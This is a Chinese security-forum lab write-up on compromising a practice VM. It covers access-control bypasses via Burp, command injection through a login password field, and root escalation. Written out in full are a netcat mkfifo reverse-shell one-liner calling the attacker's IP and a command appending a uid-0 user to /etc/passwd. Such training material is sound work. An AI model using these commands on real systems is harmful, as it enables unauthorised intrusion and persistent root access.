用户
搜索
  • TA的每日心情
    慵懒
    2020-6-15 20:25
  • 签到天数: 16 天

    连续签到: 1 天

    [LV.4]经常看看II

    i春秋-脚本小子

    Rank: 2

    5

    主题

    11

    帖子

    319

    魔法币
    收听
    0
    粉丝
    0
    注册时间
    2017-11-20
    发表于 2020-4-29 18:53:40 01727
    本帖最后由 Ybwh 于 2020-5-7 11:24 编辑

    本文原创作者Ybwh,本文属i春秋原创奖励计划,未经许可禁止转载!
    环境镜像地址:https://pan.baidu.com/s/1pzTcsMf5vI1nFDkHXaNNnQ 提取码:1jt6
    在 VM VirtualBoxVM VirtualBox中打开
    该靶场存在水平越权和一个垂直越权,然后利用命令执行反弹一个shell再进行提权
    1588155214.jpg
    使用nmap扫描ip 查看80端口开放 访问web查看
    QQ截图20200429181537.png
    我们发现可以登录但是不能注册

    审查元素 查看 main.js 搜索register 发现了存储了注册需要的信息

    clipboard.png

    这里应该是注册用的路径

    clipboard1.png

    先在登录处用burp 包(上图的ip是192.168.1.7 下面的是192.168.0.194 一开始我忘记截图开机登陆界面后显示ip地址了后来再加上那个截图转换了网络模式就变换了ip)
    clipboard2.png
    修改数据包改为注册
    clipboard3.png
    使用 test 123 登录测试
    clipboard4.png
    同样的方法再注册一个 测试一下水平越权 新注册了一个 abc 在url的最后把test改为abc 发现水平越权成功
    clipboard5.png
    试一下admin 的垂直越权
    clipboard6.png
    无返回信息 这里不行
    在登陆处进行抓包 发现明文传输
    clipboard7.png
    "auth_level":"standard_user"}}  此处标识了等级 将响应返回数据包中standard_user改为master_admin_user放行后
    clipboard8.png
    admin越权成功,还有一种方式说利用 jwt解码把standard_us er改为master_admin_user 然后加密 把重新加密后的在burp中替换掉,但是我直接在burp中替换也可以越权成功
    clipboard9.png
    分析源代码可知此处存在命令执行漏洞
    clipboard10.png
    多次go 发现返回均为200
    在错误的密码后面插入下面反弹shell语句:

    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1|nc 192.168.0.134 443 >/tmp/f;

    里面的IP地址是kali本机IP地址,接着在kali中打开监听,然后在burpsuit点击GO即可
    clipboard11.png
    kali成功反弹shell
    使用python命令获得一个标准shell(直接获取到的shell是真的难用的不行)
    python -c "import pty;pty.spawn('/bin/bash')"

    clipboard12.png
    拿到shell后开始进行提权
    创建一个新用户
    perl -le 'print crypt("pass","fairy")'
    clipboard13.png
    将新用户生成的密文写进/etc/passwd文件
    $ echo 'fairy:faa8LvXdAzuag:0:0:fairy:/root:/bin/bash' >> /etc/passwd
    查看/etc/passwd 文件
    cat /etc/passwd
    clipboard14.png
    登录刚刚创建的fairy用户,成功提权至root用户













    clipboard7.png
    QQ截图20200429181612.png

    本帖被以下淘专辑推荐:

    发新帖
    您需要登录后才可以回帖 登录 | 立即注册